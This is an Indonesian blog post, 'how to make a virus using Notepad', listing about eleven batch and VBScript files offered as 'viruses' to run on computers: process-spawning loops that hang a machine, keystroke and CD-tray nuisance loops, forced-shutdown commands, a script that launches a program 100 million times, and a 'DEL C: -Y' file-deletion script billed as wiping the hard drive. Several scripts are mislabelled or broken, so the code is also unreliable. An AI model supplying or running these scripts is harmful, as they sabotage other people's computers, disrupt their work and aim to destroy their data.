Cara membuat virus menggunakan Notepad


Kali ini saya akan membagikan cara membuat virus menggunakan notepad, pertama siapkan notepad terlebih dahulu.

1. Buka notepad nya melalui start - all programs - accessories - notepad kemudian copy kode script berikut ke notepad : 

start

start

start

start

start

start

start

start

start

start

start

start


Simpan dengan nama apa aja, tapi extensi nya harus bat. Misal "eror.bat" tanpa tanda kutip. Save as typenya ganti jadi all files. Trick ini jika di klik akan membuka banyak cmd sehingga komputer akan hang

2. Buka notepad, copy kode berikut.

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top


Simpan dengan nama apa saja dengan extensi bat. Misal "eror.bat" Seperti yang tadi,lalu save as type ganti jadi All Files. Trick ini jika di klik akan membuka notepad dengan sendirinya

3.Masih dengan notepad, buka notepad dan copy kode berikut

MsgBox "kembali ke menu sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop


Simpan di notepad dengan nama apa saja, jangan lupa dengan extensi vbc. Misal eror.vbs,lalu save as type ganti jadi All Files

4. Masih menggunakan notepad. Buka notepad dan copy kode berikut

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Simpan kode tersebut di notepad dengan nama apa saja dengan  exstensi .vbs contoh : "eror.vbs" dan Save As Type ganti menjadi All Files, maka akan bisa membuat CD/DVD Room buka tutup dengan sendirinya secara otomatis.

6. Buka notepad kalian dan copy kode berikut. 

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop


Simpan kode script tersebut dengan nama apa saja  dengan exstensi .vbs contoh "eror.vbs" dan Save As Type ganti menjadi All Files, jika File ini di buka akan membuat Caps Lock menyala terus menerus.

7. Buka notepad dan copy kode dibawah ini 

@echo off
msg * I don't like you
shutdown -c "Error! You are too ******!" -s

Simpan kode script tersebut dengan nama bebas dan dengan exstensi .vbs contoh "eror.vbs" dan Save As Type ganti menjadi All Files,  jika file ini dibuka akan membuat komputer shoutdown sendiri

8.Trik yang ini sama dengan trik ke  7 hanya saja yang ini ada waktunya, copy code berikut ke notepad

@echo shutdown -s -t 1 -f 

Simpan kode script tersebut dengan nama apa saja  dengan exstensi .bat , contoh : "eror.bat" tanpa tanda kutip dan Save As Type ganti menjadi All Files, Jika file ini dibuka akan  membuat komputer Shoutdown, hanya saja yang membedakan adalah yang ada  waktunya, lihat angka pada kode script tersebut yang berwarna biru, itu adalah waktu yang dibutuhkan untuk mematikan komputer, bisa di atur sesuai keinginan (1 = 1 detik). Misal 
@echo shutdown -s -t 30 -f, jika angka 1 digant 30 akan membuat komputer mati dalam 30 detik 

9. Trik ini lumayan berbahaya, karena komputer akan dipenuhi oleh 100000000
tourstart yang akan memenuhi layar monitor dan akan membuat komputer menjadi hang,
untuk mengatasinya dapat mendelete semua tourstart tersebut atau langsung merestart 
komputer. Silahkan copas/ketik kode script berikut ke notepad : 

option explicit
dim wshshell
set wshshell=wscript.createobject(“wscript.shell”)
dim x
for x = 1 to 100000000
wshshell.run “tourstart.exe”
next


Simpan dengan nama bebas dan dengan exstensi .vbs contoh : "virus.vbs" tanpa tanda kutip dan Save As type ganti menjadi All Files. Pada angka 
100000000 bisa di ganti sesuai keinginan, bisa diganti menjadi 100 atau 1000 saja, dan begitu file ini dibuka akan membuat tourstart sesuai dengan angka yang ditulis pada kode tesebut,

10. Trik ini saya rasa paling berbayaha, karena dapat menghapus seluruh data di hardisk, sehingga mau tidak mau ya harus instal ulang, langsung saja copy kode script berikut di notepad : 

@echo off
DEL C: -Y
DEL D: -Y


Simpan dengan nama apa saja dengan exstensi .bat contoh "virus.bat" tanpa tanda kutip dan Save As Type ganti menjadi All Files dan simpan , tapi JANGAN DIKLIK karena bisa berakibat fatal bagi komputer anda.

11. Ini tambahan, copy kode berikut di notepad

cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo BANGUN TIDUR KU TERUS MENGHANCURKAN SYSTEM…^__^
echo …………………
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo NEXT…………!
echo:
echo:
echo HALO SOBAT
echo MAU JADI TEMAN AKU ??
echo:
echo:
echo IM CATUREKO!!!
start /w wscript.exe C:\sleep2000.vbs
echo …………
start /w wscript.exe C:\sleep4000.vbs
echo …………
echo NTAR…….!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo VIRUS INI ADALAH VIRUS YANG SANGAT MEMATIKAN…
cd C:\Documents and Settings\All Users\Start Menu\Programs\
mkdir Si_INDO_CRACKER
start /w wscript.exe C:\sleep3000.vbs
echo:
echo:
echo:
echo:
echo HAPPY BIRTHDAY
echo KOMPUTER KAMU BAGUS DEH
echo BOLEH Q INTIP DIKIT
echo HMM BOLEH JUGA NEH ISINYA
echo CALL ME YACHH +627840xxxxxx GPRS JUGA BOLEH KOK
echo:
echo:
echo:
echo:
echo:
echo SABARAN BRO…
start /w wscript.exe C:\sleep3000.vbs
echo ………..
echo zzzzzzz….
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo OKE….Virus AKTIF!
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
echo FIREWALL KAMU ANCUR…
start /w wscript.exe C:\sleep2000.vbs
echo SEMUA PROSESS UDAH DIBANTAI…
start /w wscript.exe C:\sleep2000.vbs
echo VIRUS SILAHKAN BOOTING DENGAN SEGALA HORMAT…
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo VIRUS MASUK PODIUM AKHIR!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo I LOVE U FULL
echo HA HA HA HA SALAM BUAT BAPAK IBU KAMU YA
echo:
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
pause
shutdown -f -s -c “MET MATI AJA YA....”

Simpan dengan extensi bat. contoh virus.bat dan save as type ganti jadi All Files. Kata kata yang ada dikode bisa diganti sesukamu...

Cara membuat virus menggunakan Notepad

5 Responses to "Cara membuat virus menggunakan Notepad"

Berkomentarlah yang baik. Jika ingin cari backlink silahkan berkomentar dengan name/url dan open id. Jangan taruh link di komentar. Bagi yang melanggar akan di hapus komentar nya. Terimakasih